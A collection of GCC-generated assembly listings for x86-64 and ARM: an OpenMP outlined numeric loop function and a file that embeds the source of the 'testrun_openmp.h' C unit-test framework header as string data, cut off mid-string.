r3, [fp, #-20] ldr r1, [fp, #-20] ldr r0, .L4+8 bl printf mov r3, #0 ldr r2, .L4 ldr r1, [r2] ldr r2, [fp, #-16] eors r1, r2, r1 mov r2, #0 beq .L3 bl __stack_chk_fail .L3: mov r0, r3 sub sp, fp, #12 @ sp needed pop {r4, r5, fp, pc} .L5: .align 2 .L4: .word .LC2 .word .LC0 .word .LC1 .size main, .-main .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "500068.c" .intel_syntax noprefix .text .globl code .bss .align 4 .type code, @object .size code, 4 code: .zero 4 .text .globl OUT__1__6119__ .type OUT__1__6119__, @function OUT__1__6119__: .LFB0: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov QWORD PTR -120[rbp], rdi mov rax, QWORD PTR -120[rbp] add rax, 160 mov rax, QWORD PTR [rax] mov rax, QWORD PTR [rax] mov QWORD PTR -40[rbp], rax mov rax, QWORD PTR -120[rbp] add rax, 152 mov rax, QWORD PTR [rax] mov eax, DWORD PTR [rax] mov DWORD PTR -88[rbp], eax mov rax, QWORD PTR -120[rbp] add rax, 144 mov rax, QWORD PTR [rax] mov rax, QWORD PTR [rax] mov QWORD PTR -32[rbp], rax mov rax, QWORD PTR -120[rbp] add rax, 136 mov rax, QWORD PTR [rax] mov eax, DWORD PTR [rax] mov DWORD PTR -84[rbp], eax mov rax, QWORD PTR -120[rbp] sub rax, -128 mov rax, QWORD PTR [rax] mov eax, DWORD PTR [rax] mov DWORD PTR -80[rbp], eax mov rax, QWORD PTR -120[rbp] mov rax, QWORD PTR 120[rax] mov QWORD PTR -24[rbp], rax mov rax, QWORD PTR -120[rbp] add rax, 112 mov rax, QWORD PTR [rax] mov eax, DWORD PTR [rax] mov DWORD PTR -76[rbp], eax mov rax, QWORD PTR -120[rbp] add rax, 104 mov rax, QWORD PTR [rax] mov eax, DWORD PTR [rax] mov DWORD PTR -72[rbp], eax mov rax, QWORD PTR -120[rbp] add rax, 96 mov rax, QWORD PTR [rax] mov eax, DWORD PTR [rax] mov DWORD PTR -68[rbp], eax mov rax, QWORD PTR -120[rbp] add rax, 88 mov rax, QWORD PTR [rax] mov eax, DWORD PTR [rax] mov DWORD PTR -64[rbp], eax mov rax, QWORD PTR -120[rbp] add rax, 80 mov rax, QWORD PTR [rax] mov eax, DWORD PTR [rax] mov DWORD PTR -60[rbp], eax mov rax, QWORD PTR -120[rbp] add rax, 72 mov rax, QWORD PTR [rax] mov eax, DWORD PTR [rax] mov DWORD PTR -56[rbp], eax mov rax, QWORD PTR -120[rbp] add rax, 64 mov rax, QWORD PTR [rax] mov eax, DWORD PTR [rax] mov DWORD PTR -52[rbp], eax mov rax, QWORD PTR -120[rbp] add rax, 56 mov rax, QWORD PTR [rax] mov eax, DWORD PTR [rax] mov DWORD PTR -48[rbp], eax mov rax, QWORD PTR -120[rbp] add rax, 48 mov rax, QWORD PTR [rax] mov eax, DWORD PTR [rax] mov DWORD PTR -44[rbp], eax mov rax, QWORD PTR -120[rbp] add rax, 40 mov rax, QWORD PTR [rax] mov eax, DWORD PTR [rax] mov DWORD PTR -104[rbp], eax mov rax, QWORD PTR -120[rbp] add rax, 32 mov rax, QWORD PTR [rax] mov eax, DWORD PTR [rax] mov DWORD PTR -100[rbp], eax mov rax, QWORD PTR -120[rbp] add rax, 24 mov rax, QWORD PTR [rax] mov eax, DWORD PTR [rax] mov DWORD PTR -96[rbp], eax mov rax, QWORD PTR -120[rbp] add rax, 16 mov rax, QWORD PTR [rax] mov eax, DWORD PTR [rax] mov DWORD PTR -92[rbp], eax mov rax, QWORD PTR -120[rbp] add rax, 8 mov rax, QWORD PTR [rax] mov rax, QWORD PTR [rax] mov QWORD PTR -16[rbp], rax mov rax, QWORD PTR -120[rbp] mov rax, QWORD PTR [rax] mov rax, QWORD PTR [rax] mov QWORD PTR -8[rbp], rax mov DWORD PTR -104[rbp], 0 jmp .L2 .L9: mov DWORD PTR -92[rbp], 0 jmp .L3 .L8: mov DWORD PTR -96[rbp], 0 jmp .L4 .L7: mov DWORD PTR -100[rbp], 0 jmp .L5 .L6: mov edx, DWORD PTR -88[rbp] mov eax, DWORD PTR -100[rbp] add edx, eax mov eax, DWORD PTR -96[rbp] imul eax, DWORD PTR -60[rbp] add edx, eax mov eax, DWORD PTR -92[rbp] imul eax, DWORD PTR -56[rbp] add eax, edx cdqe lea rdx, 0[0+rax*8] mov rax, QWORD PTR -32[rbp] add rax, rdx movsd xmm0, QWORD PTR [rax] mov eax, DWORD PTR -96[rbp] imul eax, DWORD PTR -76[rbp] mov edx, eax mov eax, DWORD PTR -100[rbp] add edx, eax mov eax, DWORD PTR -92[rbp] imul eax, DWORD PTR -72[rbp] lea ecx, [rdx+rax] mov rax, QWORD PTR -40[rbp] mov rdx, QWORD PTR 64[rax] mov eax, DWORD PTR -80[rbp] cdqe sal rax, 3 add rax, rdx mov rdx, QWORD PTR [rax] mov eax, DWORD PTR -104[rbp] cdqe sal rax, 2 add rax, rdx mov eax, DWORD PTR [rax] add eax, ecx cdqe lea rdx, 0[0+rax*8] mov rax, QWORD PTR -16[rbp] add rax, rdx movsd xmm2, QWORD PTR [rax] mov eax, DWORD PTR -96[rbp] imul eax, DWORD PTR -68[rbp] mov edx, eax mov eax, DWORD PTR -100[rbp] add edx, eax mov eax, DWORD PTR -92[rbp] imul eax, DWORD PTR -64[rbp] lea ecx, [rdx+rax] mov rax, QWORD PTR -24[rbp] mov edx, DWORD PTR -104[rbp] movsx rdx, edx mov eax, DWORD PTR [rax+rdx*4] add eax, ecx cdqe lea rdx, 0[0+rax*8] mov rax, QWORD PTR -8[rbp] add rax, rdx movsd xmm1, QWORD PTR [rax] mulsd xmm1, xmm2 mov edx, DWORD PTR -88[rbp] mov eax, DWORD PTR -100[rbp] add edx, eax mov eax, DWORD PTR -96[rbp] imul eax, DWORD PTR -60[rbp] add edx, eax mov eax, DWORD PTR -92[rbp] imul eax, DWORD PTR -56[rbp] add eax, edx cdqe lea rdx, 0[0+rax*8] mov rax, QWORD PTR -32[rbp] add rax, rdx subsd xmm0, xmm1 movsd QWORD PTR [rax], xmm0 mov DWORD PTR code[rip], 1 add DWORD PTR -100[rbp], 1 .L5: mov eax, DWORD PTR -100[rbp] cmp eax, DWORD PTR -52[rbp] jl .L6 add DWORD PTR -96[rbp], 1 .L4: mov eax, DWORD PTR -96[rbp] cmp eax, DWORD PTR -48[rbp] jl .L7 add DWORD PTR -92[rbp], 1 .L3: mov eax, DWORD PTR -92[rbp] cmp eax, DWORD PTR -44[rbp] jl .L8 add DWORD PTR -104[rbp], 1 .L2: mov eax, DWORD PTR -104[rbp] cmp eax, DWORD PTR -84[rbp] jl .L9 nop nop pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE0: .size OUT__1__6119__, .-OUT__1__6119__ .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "500068.c" .text .comm code,4,4 .global __aeabi_dmul .global __aeabi_dsub .align 2 .global OUT__1__6119__ .syntax unified .arm .fpu softvfp .type OUT__1__6119__, %function OUT__1__6119__: @ args = 0, pretend = 0, frame = 96 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, r5, r6, r8, r9, fp, lr} add fp, sp, #24 sub sp, sp, #100 str r0, [fp, #-120] ldr r3, [fp, #-120] add r3, r3, #80 ldr r3, [r3] ldr r3, [r3] str r3, [fp, #-96] ldr r3, [fp, #-120] add r3, r3, #76 ldr r3, [r3] ldr r3, [r3] str r3, [fp, #-92] ldr r3, [fp, #-120] add r3, r3, #72 ldr r3, [r3] ldr r3, [r3] str r3, [fp, #-88] ldr r3, [fp, #-120] add r3, r3, #68 ldr r3, [r3] ldr r3, [r3] str r3, [fp, #-84] ldr r3, [fp, #-120] add r3, r3, #64 ldr r3, [r3] ldr r3, [r3] str r3, [fp, #-80] ldr r3, [fp, #-120] ldr r3, [r3, #60] str r3, [fp, #-76] ldr r3, [fp, #-120] add r3, r3, #56 ldr r3, [r3] ldr r3, [r3] str r3, [fp, #-72] ldr r3, [fp, #-120] add r3, r3, #52 ldr r3, [r3] ldr r3, [r3] str r3, [fp, #-68] ldr r3, [fp, #-120] add r3, r3, #48 ldr r3, [r3] ldr r3, [r3] str r3, [fp, #-64] ldr r3, [fp, #-120] add r3, r3, #44 ldr r3, [r3] ldr r3, [r3] str r3, [fp, #-60] ldr r3, [fp, #-120] add r3, r3, #40 ldr r3, [r3] ldr r3, [r3] str r3, [fp, #-56] ldr r3, [fp, #-120] add r3, r3, #36 ldr r3, [r3] ldr r3, [r3] str r3, [fp, #-52] ldr r3, [fp, #-120] add r3, r3, #32 ldr r3, [r3] ldr r3, [r3] str r3, [fp, #-48] ldr r3, [fp, #-120] add r3, r3, #28 ldr r3, [r3] ldr r3, [r3] str r3, [fp, #-44] ldr r3, [fp, #-120] add r3, r3, #24 ldr r3, [r3] ldr r3, [r3] str r3, [fp, #-40] ldr r3, [fp, #-120] add r3, r3, #20 ldr r3, [r3] ldr r3, [r3] str r3, [fp, #-112] ldr r3, [fp, #-120] add r3, r3, #16 ldr r3, [r3] ldr r3, [r3] str r3, [fp, #-108] ldr r3, [fp, #-120] add r3, r3, #12 ldr r3, [r3] ldr r3, [r3] str r3, [fp, #-104] ldr r3, [fp, #-120] add r3, r3, #8 ldr r3, [r3] ldr r3, [r3] str r3, [fp, #-100] ldr r3, [fp, #-120] add r3, r3, #4 ldr r3, [r3] ldr r3, [r3] str r3, [fp, #-36] ldr r3, [fp, #-120] ldr r3, [r3] ldr r3, [r3] str r3, [fp, #-32] mov r3, #0 str r3, [fp, #-112] b .L2 .L9: mov r3, #0 str r3, [fp, #-100] b .L3 .L8: mov r3, #0 str r3, [fp, #-104] b .L4 .L7: mov r3, #0 str r3, [fp, #-108] b .L5 .L6: ldr r2, [fp, #-92] ldr r3, [fp, #-108] add r2, r2, r3 ldr r3, [fp, #-104] ldr r1, [fp, #-56] mul r3, r1, r3 add r2, r2, r3 ldr r3, [fp, #-100] ldr r1, [fp, #-52] mul r3, r1, r3 add r3, r2, r3 lsl r3, r3, #3 ldr r2, [fp, #-88] add r3, r2, r3 ldmia r3, {r4-r5} ldr r3, [fp, #-104] ldr r2, [fp, #-72] mul r2, r3, r2 ldr r3, [fp, #-108] add r2, r2, r3 ldr r3, [fp, #-100] ldr r1, [fp, #-68] mul r3, r1, r3 add r2, r2, r3 ldr r3, [fp, #-96] ldr r1, [r3, #36] ldr r3, [fp, #-80] lsl r3, r3, #2 add r3, r1, r3 ldr r1, [r3] ldr r3, [fp, #-112] lsl r3, r3, #2 add r3, r1, r3 ldr r3, [r3] add r3, r2, r3 lsl r3, r3, #3 ldr r2, [fp, #-36] add r3, r2, r3 ldmia r3, {r0-r1} ldr r3, [fp, #-104] ldr r2, [fp, #-64] mul r2, r3, r2 ldr r3, [fp, #-108] add r2, r2, r3 ldr r3, [fp, #-100] ldr ip, [fp, #-60] mul r3, ip, r3 add r2, r2, r3 ldr r3, [fp, #-76] ldr ip, [fp, #-112] ldr r3, [r3, ip, lsl #2] add r3, r2, r3 lsl r3, r3, #3 ldr r2, [fp, #-32] add r3, r2, r3 ldmia r3, {r2-r3} bl __aeabi_dmul mov r2, r0 mov r3, r1 mov r8, r2 mov r9, r3 ldr r2, [fp, #-92] ldr r3, [fp, #-108] add r2, r2, r3 ldr r3, [fp, #-104] ldr r1, [fp, #-56] mul r3, r1, r3 add r2, r2, r3 ldr r3, [fp, #-100] ldr r1, [fp, #-52] mul r3, r1, r3 add r3, r2, r3 lsl r3, r3, #3 ldr r2, [fp, #-88] add r6, r2, r3 mov r2, r8 mov r3, r9 mov r0, r4 mov r1, r5 bl __aeabi_dsub mov r2, r0 mov r3, r1 stm r6, {r2-r3} ldr r3, .L10 mov r2, #1 str r2, [r3] ldr r3, [fp, #-108] add r3, r3, #1 str r3, [fp, #-108] .L5: ldr r2, [fp, #-108] ldr r3, [fp, #-48] cmp r2, r3 blt .L6 ldr r3, [fp, #-104] add r3, r3, #1 str r3, [fp, #-104] .L4: ldr r2, [fp, #-104] ldr r3, [fp, #-44] cmp r2, r3 blt .L7 ldr r3, [fp, #-100] add r3, r3, #1 str r3, [fp, #-100] .L3: ldr r2, [fp, #-100] ldr r3, [fp, #-40] cmp r2, r3 blt .L8 ldr r3, [fp, #-112] add r3, r3, #1 str r3, [fp, #-112] .L2: ldr r2, [fp, #-112] ldr r3, [fp, #-84] cmp r2, r3 blt .L9 nop nop sub sp, fp, #24 @ sp needed pop {r4, r5, r6, r8, r9, fp, pc} .L11: .align 2 .L10: .word code .size OUT__1__6119__, .-OUT__1__6119__ .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "287867.c" .intel_syntax noprefix .text .section .rodata .align 8 .LC0: .ascii "/***\n ----------------------------------------------" .ascii "--------------------------\n\n Copyright 2017 Markus " .ascii "Toepfer\n\n Licensed under the Apache License, Versio" .ascii "n 2.0 (the \"License\");\n you may not use this file " .ascii "except in compliance with the License.\n You may obta" .ascii "in a copy of the License at\n\n http://www.ap" .ascii "ache.org/licenses/LICENSE-2.0\n\n Unless required by " .ascii "applicable law or agreed to in writing, software\n di" .ascii "stributed under the License is distributed on an \"AS IS\" B" .ascii "ASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND," .ascii " either express or implied.\n See the License for the" .ascii " specific language governing permissions and\n limita" .ascii "tions under the License.\n\n This file is part of the" .ascii " testrun project. http://testrun.info\n\n -----------" .ascii "------------------------------------------------------------" .ascii "-\n *//**\n\n @file testrun_openmp.h\n " .ascii " @author Markus Toepfer\n @date 2" .ascii "017-11-17\n\n @brief Serial and parallel tes" .ascii "t executing framework with or\n witho" .ascii "ut assertion based testing.\n\n This is an enhanced a" .ascii "nd compatible version of the initial idea of an\n sma" .ascii "ll and simple C89 compatible C unittest header (@see testrun" .ascii ".h)\n\n For parallel test runs, this framework makes " .ascii "use of OpenMP. Therefore\n the code MUST be compiled " .ascii "with -fopenmp, otherwise the code will stay\n unparal" .ascii "lel and execution sequential.\n\n @NOTE to use all pr" .ascii "ovided functionality of the header, tests SHOULD be\n " .ascii " compiled using:\n\n -fopenmp (parallel ex" .ascii "ecution) and\n -rdynamic (function name bac" .ascii "ktracing)\n\n @NOTE Valgrind based file execution in " .ascii "libomp based OpenMP scenarios\n may not work, @see do" .ascii "cs/valgrind/openMP/README.MD for additional\n informa" .ascii "tion.\n\n -------------------------------------------" .ascii "-----------------------------\n */\n\n#ifndef testrun_openmp" .ascii "_h\n#define te" .ascii "strun_openmp_h\n\n#include <omp.h> /* OpenMP " .ascii "parallel (part of GCC, Clang/LLVM) */\n\n#include <stdbool.h" .ascii "> /* C99 */\n#include <stdint.h> /* C" .ascii "99 */\n\n#include <unistd.h> /* C89/C90 */\n#inc" .ascii "lude <stdlib.h> /* C89/C90 */\n#include <stdio.h" .ascii "> /* C89/C90 */\n#include <string.h> " .ascii " /* C89/C90 */\n#include <errno.h> /* C89/C90 " .ascii "*/\n#include <time.h> /* C89/C90 */\n#include " .ascii "<assert.h> /* C89/C90 */\n\n#if defined(__GLIBC_" .ascii "_)\n#include <execinfo.h> /* Gnulib backtrace of f" .ascii "unction pointer names */\n#endif\n\n#define TESTRUN_DEFAULT_" .ascii "CLUSTER_MAX 1000\n\n/*--------------------------------------" .ascii "--------------------------------------*/\n\n/**\n Err" .ascii "or initialization of none error.\n*/\n#define testrun_errno(" .ascii ") \\\n (errno == 0 ? \"NONE\" : strerror(errno))\n\n" .ascii "/*----------------------------------------------------------" .ascii "------------------*/\n\n/**\n Log a failure. Failure:" .ascii " Inability to perform a function as expected.\n*/\n#define t" .ascii "estrun_log_failure(msg, ...) \\\n fprintf(stderr, \"\\" .ascii "t[FAIL]\\t%s line:%d errno:%s message: \" msg \"\\n\",\\\n " .ascii " __FUNCTION__, __LINE__, testrun_errno(), ##__VA_ARGS__" .ascii ")\n\n/*-----------------------------------------------------" .ascii "-----------------------*/\n\n/**\n Log an error. Erro" .ascii "r: Difference between expected and actual result.\n*/\n#defi" .ascii "ne testrun_log_error(msg, ...) \\\n fprintf(stderr, \"" .ascii "\\t[ERROR]\\t%s line:%d errno:%s message: \" msg \"\\n\",\\\n" .ascii " __FUNCTION__, __LINE__, testrun_errno(), ##__VA_ARGS" .ascii "__)\n\n/*---------------------------------------------------" .ascii "-------------------------*/\n\n#define testrun_log_success(m" .ascii "sg, ...) \\\n fprintf(stdout, \"\\t[OK] \\t%s \" msg " .ascii "\"\\n\", __FUNCTION__, ##__VA_ARGS__)\n\n/*-----------------" .ascii "-----------------------------------------------------------*" .ascii "/\n\n#define testrun_log(msg, ...) \\\n fprintf(stdou" .ascii "t, \"\\t\" msg \"\\n\", ##__VA_ARGS__)\n\n/*----------------" .ascii "--------------------------------------------------" .ascii "----------*/\n\n#define testrun_log_function_info(msg, ...) " .ascii "\\\n fprintf(stdout, \"\\t[INFO] \\t%s line:%d messag" .ascii "e: \" msg \"\\n\", \\\n __FUNCTION__, __LINE_" .ascii "_, ##__VA_ARGS__)\n\n/*-------------------------------------" .ascii "---------------------------------------*/\n\n#define testrun" .ascii "_log_clock(start, end) \\\n fprintf(stdout, \"\\tCloc" .ascii "k ticks function: ( %s ) | %f | %.0f ms \\n\",\\\n __" .ascii "func__, \\\n ((double)(end - start)) / CLOCKS_PER_SEC" .ascii ", \\\n (((double)(end - start)) / CLOCKS_PER_SEC ) * " .ascii "1000)\n\n/*-------------------------------------------------" .ascii "---------------------------\n *\n * Block of supporting" .ascii " MACROS for assert based testing.\n *\n * Assert based " .ascii "testing is build around the principle to bundle and\n * " .ascii " define some testcases, which will be run in series.\n * " .ascii " Within the testcases testrun_assert(), or assert() may be " .ascii "used to\n * stop testing.\n *\n * ----------------" .ascii "-------------------------------------------------\n *\n * " .ascii " Example usage:\n *\n * int testcase1_function(){\n *" .ascii " assert(true);\n * return testrun_" .ascii "log_success();\n * }\n *\n * int testcase1_functio" .ascii "n(){\n * testrun_assert(true, \"additional info" .ascii " an failure.\");\n * return testrun_log_success" .ascii "();\n * }\n *\n * int testseries() {\n *\n * " .ascii " testrun_init();\n *\n * testrun_test(te" .ascii "stcase1_function);\n * testrun_test(testcase2_f" .ascii "unction);\n *\n * return testrun_counter;\n * " .ascii " }\n *\n * testrun_run(testseries);\n *\n *---------" .ascii "------------------------------------------------------------" .ascii "-------*/\n\n#define testrun_init() \\\n int result " .ascii "= 0; \\\n int testrun_counter = 0;\n\n/*-------------" .ascii "------------------------------------------------------------" .ascii "---*/\n\n/**\n Wrapper around assert, which adds a me" .ascii "ssage level to assert, to provide\n additional and re" .ascii "lated information e.g. a failure description.\n\n @pa" .ascii "ram test an actual test case e.g. (1 =" .ascii "= 0)\n @param message additional message to log e.g." .ascii " \"Failure: 1 is not one\"\n*/\n#define testrun_assert(test," .ascii " ... )\\\n if (!(test)) { testrun_log_error(__VA_ARGS" .ascii "__); assert(test); }\n\n/*----------------------------------" .ascii "------------------------------------------*/\n\n/**\n " .ascii " Run a single test (execute a function pointer. Runs a test " .ascii "function.\n On non negative return value of the funct" .ascii "ion run, a testrun_counter\n is increased, on negativ" .ascii "e result, the negative result will be returned.\n\n @" .ascii "param test function pointer of the test to run\n " .ascii "@NOTE The surrounding block is left on negative re" .ascii "sult of the\n function pointer execut" .ascii "ion.\n*/\n#define testrun_test(test)\\\n result = tes" .ascii "t(); testrun_counter++; if (result < 0) return result;\n\n/*" .ascii "------------------------------------------------------------" .ascii "----------------*/\n\n/**\n Runs a function pointer, " .ascii "which SHALL contain the test function pointers\n to r" .ascii "un. The function pointer is wrapped in a main procedure, whi" .ascii "ch and\n allows indepentent testruns of the input tes" .ascii "tcluster over external\n execution.\n\n A cloc" .ascii "k will be started, as soon as the main is executed and the t" .ascii "he\n time is stopped again, at the end of the executi" .ascii "on. The difference\n will be printed and is the runti" .ascii "me of the whole input testcluster.\n\n A run will fai" .ascii "l, as soon as one of the tests in the testcluster fails.\n " .ascii " (Fail on first) or will run all functions dependent on" .ascii " the testsetup.\n\n @param testcluster function " .ascii "pointer to be executed.\n*/\n#define testrun_run(testcluster" .ascii ") int main(int argc, char *argv[]) {\\\n argc = argc;" .ascii "\\\n clock_t start1_t, end1_t; \\\n start1_t =" .ascii " clock(); \\\n testrun_log(\"\\ntestrun\\t%s\", argv[" .ascii "0]);\\\n int64_t result = testcluster();\\\n i" .ascii "f (result > 0) \\\n testrun_log(\"ALL TESTS R" .ascii "UN (%jd tests)\", result);\\\n end1_t = clock(); \\\n" .ascii " testrun_log_clock" .ascii "(start1_t, end1_t); \\\n testrun_log(\"\");\\\n " .ascii " result >= 0 ? exit(EXIT_SUCCESS) : exit(EXIT_FAILURE); \\\n" .ascii "}\n\n/*-----------------------------------------------------" .ascii "-----------------------\n *\n * Block of supporting MAC" .ascii "ROS an inline functions for sequntial and\n * parallel " .ascii "testing. Most of the functionality is realted to configure\n" .ascii " * testseries for parallel and/or sequential runs. Whic" .ascii "h functions may\n * be run as parallel tests or sequent" .ascii "ial tests, is up to the test\n * developer.\n *\n * " .ascii " This type of testing is highly customizable and may be ada" .ascii "pted\n * and customized by each test module implementat" .ascii "ion.\n *\n * ------------------------------------------" .ascii "-----------------------\n *\n * An implementation MUST " .ascii "to support the testrun_fun_tests() function\n * is the " .ascii "implementation of the configure functions. These functions\n" .ascii " * define, which testseries may be run in parallel and " .ascii "which sequential.\n *\n * bool testrun_configur" .ascii "e_parallel(\n * int (*testcases[])(),\n" .ascii " * size_t * const start,\n * " .ascii " size_t const * const max);\n *\n * as well a" .ascii "s\n *\n * bool testrun_configure_sequential(\n " .ascii "* int (*testcases[])(),\n * " .ascii " size_t * const start,\n * siz" .ascii "e_t const * const max);\n *\n * -----------------------" .ascii "------------------------------------------\n *\n * Exam" .ascii "ple usage:\n *\n * int testcase1_function(){\n * " .ascii " testrun(true);\n * return testrun_log_su" .ascii "ccess();\n * }\n *\n * int testcase1_function(){\n" .ascii " * testrun(true, \"additional info an failure.\"" .ascii ");\n * return testrun_log_success();\n * }" .ascii "\n *\n * int64_t testseries(int(*tests[])(), size_t slo" .ascii "t, size_t max) {\n *\n * testrun_init();\n *\n " .ascii "* testrun_add(testcase1_function);\n * " .ascii " testrun_add(testcase2_function);\n *\n * r" .ascii "eturn testrun_counte" .ascii "r;\n * }\n *\n * ---------------------------------" .ascii "--------------------------------\n *\n * NOTE: Here we " .ascii "configure a testseries to be run sequential and parallel\n *" .ascii "\n * bool testrun_configure_parallel(\n * " .ascii " int (*testcases[])(),\n * size_" .ascii "t * const start,\n * size_t const * con" .ascii "st max){\n *\n * if (testrun_add_testcases(test" .ascii "cases,start,end,testseries) < 0)\n * re" .ascii "turn false;\n *\n * return true;\n *\n * b" .ascii "ool testrun_configure_sequential(\n * i" .ascii "nt (*testcases[])(),\n * size_t * const" .ascii " start,\n * size_t const * const max){\n" .ascii " *\n * if (testrun_add_testcases(testcases,star" .ascii "t,end,testseries) < 0)\n * return false" .ascii ";\n *\n * return true;\n *\n * -----------" .ascii "------------------------------------------------------\n *\n" .ascii " * NOTE: This last function definition is needed to con" .ascii "figure the\n * maximum amount of parallel and sequentia" .ascii "l tests as parameters\n * instead of a predefinition.\n" .ascii " *\n * int64_t run_tests(){\n * return tes" .ascii "trun_run_tests(1000,1000,false);\n * }\n *\n * tes" .ascii "trun_run(run_tests);\n *\n *--------------------------------" .ascii "--------------------------------------------*/\n\n/**\n " .ascii " MUST be implemented to configure parallel tests.\n\n " .ascii " @param testcases array of function pointers\n " .ascii " @param start first slot the be used in testcas" .ascii "es\n @param max maximum slots of testcas" .ascii "es (last slot to be set)\n @returns tr" .ascii "ue on success, false on errror\n*/\nbool testrun_configure_p" .ascii "arallel(\n int (*testcases[])(),\n size_t * co" .ascii "nst start,\n size_t const * const max);\n\n/*--------" .ascii "------------------------------------------------------------" .ascii "--------*/\n\n/**\n MUST be implemented to configure " .ascii "sequential tests.\n\n @param testcases array o" .ascii "f function pointer" .ascii "s\n @param start first slot the be used in" .ascii " testcases\n @param max maximum slots of" .ascii " testcases (last slot to be set)\n @returns " .ascii " true on success, false on errror\n*/\nbool testrun_con" .ascii "figure_sequential(\n int (*testcases[])(),\n s" .ascii "ize_t * const start,\n size_t const * const max);\n\n" .ascii "/*----------------------------------------------------------" .ascii "------------------*/\n\n/**\n Run a single atomar tes" .ascii "t. Return the surrounding block on error.\n This func" .ascii "tion will leave the context block running on error. The\n " .ascii " Mindset is a defused assert. LEAVE THE FUNCTION NOT THE" .ascii " PROGRAM.\n\n @param test Boolean decision input." .ascii "\n*/\n#define testrun_check(test, ... )\\\n if (!(tes" .ascii "t)) { testrun_log_error(__VA_ARGS__); return -1;}\n\n/*----" .ascii "------------------------------------------------------------" .ascii "------------*/\n\n/**\n Alias to @see testrun_check.\n" .ascii "*/\n#define testrun(test, ...)\\\n testrun_check(test" .ascii ", __VA_ARGS__ )\n\n/*---------------------------------------" .ascii "-------------------------------------*/\n\n/**\n Add " .ascii "a new test to the tests array. This is a convinience functio" .ascii "n\n to add a function pointer to the array tests[]. T" .ascii "his MACRO uses\n block variables **slot**, **testrun_" .ascii "counter**, **max** and **tests[]**.\n\n @param test " .ascii " function pointer to a new test to be added.\n*/\n#define " .ascii "testrun_add(test) \\\n if (slot + testrun_counter ==" .ascii " max) { \\\n testrun_log_failure(\"All test s" .ascii "lots filled, \" \\\n \"check config T" .ascii "ESTS[MAX].\"); \\\n if (testrun_counter == 0)" .ascii " \\\n return -1; \\\n " .ascii "return -testrun_counter; \\\n } else { \\\n " .ascii " tests[slot + testrun_counter] = test; \\\n " .ascii " testrun_counter++; \\\n }\n\n/*------------------" .ascii "----------------------------------------------------------*/" .ascii "\n\n/**\n Array initialization to point to NULL.\n\n " .ascii " @param array array to" .ascii " be initialized\n @param start first item to set t" .ascii "o NULL\n @param end last item to set to NULL\n*/" .ascii "\n#define testrun_init_testcases(array, start, end, ...) \\\n" .ascii " for (size_t i = start; i < end; i++ ) { array[i] = N" .ascii "ULL; }\n\n/*------------------------------------------------" .ascii "----------------------------*/\n\n/**\n Add some test" .ascii " cases to a testcase function pointer array, using\n " .ascii "a user provided function to add the testcases.\n\n Fu" .ascii "nction will log the result of testcases added.\n\n @p" .ascii "aram tests pointer to function pointer array\n " .ascii " @param last pointer to counter of last set " .ascii "item\n @param max pointer to value of ma" .ascii "x items\n @param function function to add the" .ascii " tests to the array\n\n @returns negat" .ascii "ive count of testcases to add\n " .ascii " positive count of added testcases\n */\nstatic inline int" .ascii "64_t testrun_add_testcases(\n int (*tests[])(),\n " .ascii " size_t * const last,\n size_t const * const max,\n" .ascii " int64_t (*function)(int (*tests[])(), size_t, size_t" .ascii ")){\n\n if (!tests || !function || !last || !max)\n " .ascii " return -1;\n\n if (*last > *max)\n " .ascii " return -1;\n\n int64_t r = 0;\n\n r" .ascii " = function(tests, *last, *max);\n\n if (r < 0) {\n\n" .ascii " // reinit all from last to end to NULL\n " .ascii " testrun_init_testcases(tests, *last, *max);\n\n " .ascii " testrun_log_failure(\n " .ascii " \"Failed to add tests to TESTS[] \"\n " .ascii " \"(usage %jd/%jd)\",\n *last, *max)" .ascii ";\n\n return -1;\n\n } else {\n\n " .ascii " *last += r;\n testrun_log_function" .ascii "_info(\n \"added %jd tests to TESTS[]" .ascii "\"\n \"(usage %jd/%jd)\",\n " .ascii " r, *last, *max);\n }\n\n return " .ascii "r;\n\n}\n\n/*-----------------------------------------------" .ascii "-----------------------------*/" .ascii "\n\n/**\n Dumb the test cases to stdout.\n\n T" .ascii "o enable a backtrace with names, the file MUST be compiled w" .ascii "ith\n MODCFLAGS += -rdynamic\n\n @param functi" .ascii "on pointer to function pointer array\n @param" .ascii " items amount of items in functions\n @par" .ascii "am names bool to try to backtrace names\n " .ascii "@returns negative count of failed tests\n " .ascii " positive count of run tests othe" .ascii "rwise\n */\nstatic inline bool testrun_dump_testcases(\n " .ascii " int (*functions[])(),\n size_t max,\n bool" .ascii " names) {\n\n if (!functions || max < 1)\n " .ascii " return false;\n\n void *pointer = NULL;\n\n " .ascii " // dump is formated to fit to standard header log and to " .ascii "dump 20 digits\n fprintf(stdout, \"\\t[DUMP]\\ttestca" .ascii "ses tests[%jd]\\n\", max);\n if (names){\n " .ascii " #if defined(__GLIBC__)\n fprintf" .ascii "(stdout, \"\\t[DUMP]\\t ... try to backtrace\\n\");\n " .ascii " #else\n fprintf(stdout, \"\\" .ascii "t[DUMP]\\t ... names not implemented\\n\");\n " .ascii " #endif\n }\n\n for (size_t i = 0; i < max; i+" .ascii "+) {\n\n pointer = (void*) functions[i];\n\n " .ascii " if (names) {\n #if def" .ascii "ined(__GLIBC__)\n backtrace_s" .ascii "ymbols_fd(&pointer, 1, STDOUT_FILENO);\n " .ascii " #else\n // fallback to pr" .ascii "intf\n fprintf(stdout, \"%20j" .ascii "d %p \\n\", i, pointer);\n #endif\n " .ascii " } else {\n fprintf(stdo" .ascii "ut, \" %20jd %p \\n\", i, pointer);\n }\n\n " .ascii " }\n\n return 